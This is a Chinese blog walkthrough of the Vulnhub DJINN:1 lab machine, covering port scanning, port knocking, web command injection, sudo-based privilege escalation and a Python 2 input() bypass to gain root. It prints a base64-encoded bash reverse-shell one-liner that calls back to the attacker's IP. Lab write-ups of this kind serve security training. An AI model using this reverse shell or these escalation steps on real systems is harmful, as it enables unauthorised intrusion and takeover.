Vulnhub靶机渗透 -- DJINN: 1

最新推荐文章于 2022-09-21 20:55:01 发布
最新推荐文章于 2022-09-21 20:55:01 发布
阅读量303 收藏
点赞数 1
分类专栏: 靶机渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33860805/article/details/121121968
版权

Vulnhub靶机渗透 — DJINN: 1

0x00 前言:

介系一个及其简单的靶机
非常适合新玩家对她进行渗透 (可以从这里下哦)
啊是的没了,就这些

0x01 信息收集:

进行常规的靶机安装操作后(还是用的VirtualBox),可以发现这台靶机是非常贴心的,已经告诉我们ip了,就不需要我们直接再去扫网段了

在这里插入图片描述
简单地用nmap扫描一下能够获得大部分内容
在这里插入图片描述
可以发现ssh是被过滤的,我的脑袋瓜啊一下子就想到了knockd,但是重新用sV扫全端口还是不对,要么就是没有这个漏洞,要么就是端口顺序不对
由于我们还能看见后面还有俩不知道的端口,所以单独对他们进行sV版本扫描
在这里插入图片描述
1337不知道是什么,7331说是一个http,但是我们进入http里却发现好像就是一个静态页面

在这里插入图片描述
那就只能再去看看ftp里有没有东西可以看看了
在这里插入图片描述

进去发现有三个txt,全都下载下来打开看看

在这里插入图片描述
第一个应该是用户名和密码,然后还说了一个port 1337里有一个游戏,第三段不知道有啥用
那我们用netcat连接1337看看是什么
发现是一个数字游戏,要求我们1000次才能给我们gift?(但是我就回车了一下干嘛还要骂我一下)
在这里插入图片描述
现在信息收集结束。

0x02 渗透过程

现在正式开始渗透
由于这个让我们输入1000次,太累了
那就写个脚本吧,一开始想到用pwntools,但是不会用…
所以我们还是写一个socket套接字好了,这个简单很多

在这里插入图片描述
诶好啦好啦别骂我啦,我知道我脚本写的差,这个过滤真是我慢慢试出来的,而且socket有点奇怪,必须recv两次结果才是完整的,所以有点长,而且有的时候还会报错接收不到信息,多跑几次就好了,最后再print的是结果,因为怕被刷掉了,然后就写了三次,我真的知道写的很差了,你们可以自己按照自己的理解去写一个
然后跑一下
在这里插入图片描述
得到了三串数字
1356 6784 3409
因为之前有过一场比赛就是knockd,但是那时候没做出来,所以对端口的敏感性很强,这个应该就是knockd敲击端口然后开放一个新的端口或者怎么样的,一想到之前的22被过滤了,一下子就说的通了,我们直接用nc按照顺序连接这三个端口
在这里插入图片描述
所以猜想成立,效果实现了,接着直接拿之前的账号密码去登录试试
在这里插入图片描述
现在线索断了,可能并没有这么简单,回想到7331,可以试试dirb去扫描一下目录,看看有没有漏下的
这边有点坑,我的字典死活爆不出来,因为我习惯命令行的dirb了,所以很多字典都加载不出来,最后是用图形化才加载出来的,而且爆了半天才出来

进去发现应该是一个WebShell,直接弹个shell过来(试了一下一直弹不出来,跳出来的页面还以为是文件包含,应该是做了过滤字符的,还是加密一下再传过去试试)
在这里插入图片描述
在这里插入图片描述

#这边是代码 (不会用这个编辑器,显示出来的效果有点low...
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMy4yMi80NDU1IDA+JjEK | base64 -d | bash

接下来反正常规操作sudo -l 或者find / -perm -4000 2>/dev/null

But!

没有什么有价值的信息,那就继续在当前目录下的一个个文件一个个看吧(我不适合代码审计 因为之前nmap上扫到了80端口的http服务是Python运行的,所以可以看看代码学习学习OuO

在这里插入图片描述

从源代码就能发现他的过滤代码,然后还能发现又一个creds
之前看到creds单词的时候是从ftp里看见的,说明之前ftp的权限就是这个用户的?,那么我们就去这个用户的目录看看
在这里插入图片描述
可以发现很寒酸啊,唯一的一个user的标志还没有权限,那还是去.dev看看吧

在这里插入图片描述
就一个creds,说明这俩不一样啊,cat一下发现里面写的是之前拿到的那个用户的密码
在这里插入图片描述

也就是说之前的那个用户密码是错的,这个才是对的,然后就可以通过ssh去进入该服务器,十分合理
直接登录ssh,成功登录,猜想验证成功
在这里插入图片描述
还是老套的sudo -l 和 SUID的查询
But! 这边sudo -l直接就看见了一个无需密码的权限
在这里插入图片描述
genie没听说过,不过linux有句老话说的好啊,有问题找男人
我们直接man genie看看
在这里插入图片描述
不理解,一个个试试看,最终发现那个-g会骂我一下,-p和-e都会显示啥啥啥wish什么的,反正就是报错,然后-cmd才是正确的,直接就进了一个shell了
在这里插入图片描述
这交啥?这叫问号大法好啊,直接给我试出来了
还是老套路直接sudo -l发现存在一个无密码的root权限执行lago命令
在这里插入图片描述
直接sudo lago看看会怎么样
在这里插入图片描述
发现是让我选个什么东西啊,一轮下来发现4是骂我的(我发现这个靶机很喜欢骂人哈
然后其他的都是balabal的在说话,就3选项应该有用
但是用他还看不了passwd??
在这里插入图片描述
线索又断了,但是其实忘记了一个地方,就是sam的home目录我们还没去过,然后一去一看,靠,果然就是在里面…
在这里插入图片描述
最后一个文件肯定没用,因为是0大小,所以不看了,还有一个.pyc是Python文件的编译后的一个文件,可以拿出来反编译试试运气
直接用nc拿出来然后拿去反编译脚本跑一下就行
uncompyle6 1.pyc > fin.py
看看成果
在这里插入图片描述
所以就知道了这个玩意就是不能看文件的,一定要猜数字才行
之前有做过一个研究,就是输入的内容是字符串和变量名去比较,然后是可以直接绕过的(现在又试了一下发现好像只适用于Python2
在这里插入图片描述
然后再去看那个源代码的语法,从print中直接可以知道是Python2的语法,所以上面说到的绕过成立,如果你嫌这种分析麻烦,也可以直接猜数字哈
最后直接sudo lago然后选择3选项输入payload “num” (就让我说她是一个payload吧
直接得到根用户权限
在这里插入图片描述
在这里插入图片描述

实验结束,关闭靶机

0x03 小结

本次主要考点为目录爆破、knockd敲击端口服务的敏感性、简单的字符绕过的应对方式以及对于Python源码和Python的小bug的了解,简单还是很简单的,这台靶机重要的就是勇于尝试,还有就是不要忘记看home目录…
还是很推荐大家可以自己下载来玩一玩,挺简单的

NanaMiko
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub BOREDHACKERBLOG SOCIAL NETWORK
weixin_45682839的博客
08-28 292
VnlnHub BOREDHACKERBLOG SOCIAL NETWORK靶机通关攻略记录,涉及知识包括:端口服务扫描、铭感目录发现、代码执行漏洞利用、内网穿透代理、漏洞利用、linux提权、exp代码修改等
vulnhub靶机DC-1渗透笔记
liver100day的博客
06-01 279
DC-1靶机渗透 靶机环境搭建: 攻击渗透机: kali IP地址:192.168.75.128 靶机:DC-1 IP地址 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 渗透过程 1.信息收集 1.1 IP地址确认 netdiscover 可以确认目标靶机IP地址为 192.168.75.141 还可以使用 arp-scan -l 同样扫描出目标靶机IP地址 1.2 爆破端口信息 既然知道了靶机的IP地址,那就理所应当的扫描下端口啦 这里使用端口扫描神器
vulnhub djinn: 1
箭雨镜屋
05-26 609
渗透思路:nmap扫描----匿名登录ftp----gobuster扫描网站目录----利用RCE getshell(payload需要base64编码)----寻找敏感信息切换到用户nitish----sudo切换到sam(善用man命令)----sudo提权到root(使用uncompyle6反编译.pyc)
VulnHub系列』djinn: 1-Walkthrough
ins1ght的博客
12-02 1134
靶机发布日期:2019年11月18日,难度:中等。摘要啥的不重要~
Vulnhub-靶机-Djinn 1
qq_43264813的博客
01-28 478
Vulnhub靶机Djinn 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/djinn-1,397/ 文章目录Vulnhub靶机Djinn 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址并进行全端口扫描: 【命令】nmap -n -sC -sV -p- 192.168.110.132 【步骤二】发现开放了21端
vulnhub-djinn1
KAKA的博客
07-14 445
获取 IP 地址,目标机器已显示: 获取信息:nmap -A -p- 192.168.67.108 得到 4 个端口: 21 --> FTP --> open --> 猜测有文件可获取 22 --> SSH --> filtered --> 猜测为敲门服务[DC 有练过] 1337 --> SOME --> open --> 使用 nc 连接 7331 --> HTTP --> open --> 网页 21 --> FTP
VulnHub-dc-1靶机渗透测试
MzHeader的博客
11-02 532
0x00 前言 在开始之前我们需要先配置一下环境,因不知道DC-1靶机的IP,所有我们需要将靶机和kali放在同一个局域网里面,我这里是桥接。 0x01 探测目标 kali:192.168.199.241 首先,我们先来探测一下目标机器的IP,这里有很多种方法,着重讲一下其中2种方法。 (1)运行arp-scan识别目标的IP地址 使用arp-scan -l命令探测同一区域中存活主机。 (2)使...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 646
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
Vulnhub靶机DJINN_ 1
LainWith的博客
02-03 1729
目录介绍信息收集主机发现主机信息探测测试1337端口测试21端口(ftp)测试7331端口(web)尝试目录扫描命令执行-反弹shell获取第一个Flag提权获取第二个Flag总结参考 介绍 系列:djinn(此系列共3台) 发布日期:2019 年 11 月 18 日 难度:初级-中级 Flag : 2个,普通用户的user.txt和root用户的root.txt 学习: gobuster 目录扫描 ftp 匿名登录 bypass 命令执行漏洞 反弹 shell 的使用 靶机地址:https://www
vulnhub靶机djinn:1渗透笔记
weixin_52268949的博客
02-16 2054
djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali ip地址 当打开这台靶机的时候我们就知道ip地址 由于我们已经确定了靶机的ip所以我们直接扫描开放端口 nmap -A -p- 192.168.20.145 首先我们去访问一下21端口的ftp服务,发现可以匿名登录。根目录有三个txt文本文件我们依次打开查看 creds.txt nitu:81299
vulnhub靶机-djinn
臭nana的博客
06-27 964
1、找到靶机ip:192.168.0.108
vulnhub靶机 djinn1
witwitwiter的博客
09-10 3650
vulnhub靶机 djinn:1 靶机地址djinn: 1 ~ VulnHub 目标为user.txt和root.txt 靶机配置 将靶机下载好后。在VM中选择打开虚拟机,在开启虚拟机之前,网络设置中调整为nat(与攻击机kali一个网段)。 渗透测试 使用nmap进行扫描 └─# nmap -p- -A -T4 192.168.5.130 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 10:01 CST Nmap scan report f
Hack djinn:1 : walkthrough【VulnHub靶场】渗透测试实战系列7
重新启程
12-14 909
靶场地址:djinn: 1 靶场介绍: Level: Beginner-Intermediate flags: user.txt and root.txt Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll...
Vulnhub-djinn2
KAKA的博客
07-15 516
欢迎来到 djinn2 的世界,首先我们得对企业环境些许了解,否则你将无法顺畅地做该练习,在企业中一般都会有备份和邮箱,所以在该练习中,要注意备份和邮箱,一般放置的目录为 /var 目录,除此之外,作者还给我们一个小提示,就是在 5000 端口服务中有 RCE 存在,我们需要利用它,除此之外,介绍一下 MSF 中的 web_delivery 模块,它用于在我们有一定的访问权限,但是没有 shell 的情况下,让咋们开始吧:D nmap -A -p- 192.168.67.33 共开放了 5 个端口,2
Vulnhub-Djinn靶机-Writeup
Vicl1fe的博客
12-03 1251
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/djinn-1,397/ 靶机知识点: arp-scan nmap ftp nc dirsearch 命令执行 python2 input漏洞 主机发现 靶机是ova格式的,可以用Vmware导入,也可以用virtualbox打开。 使用...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值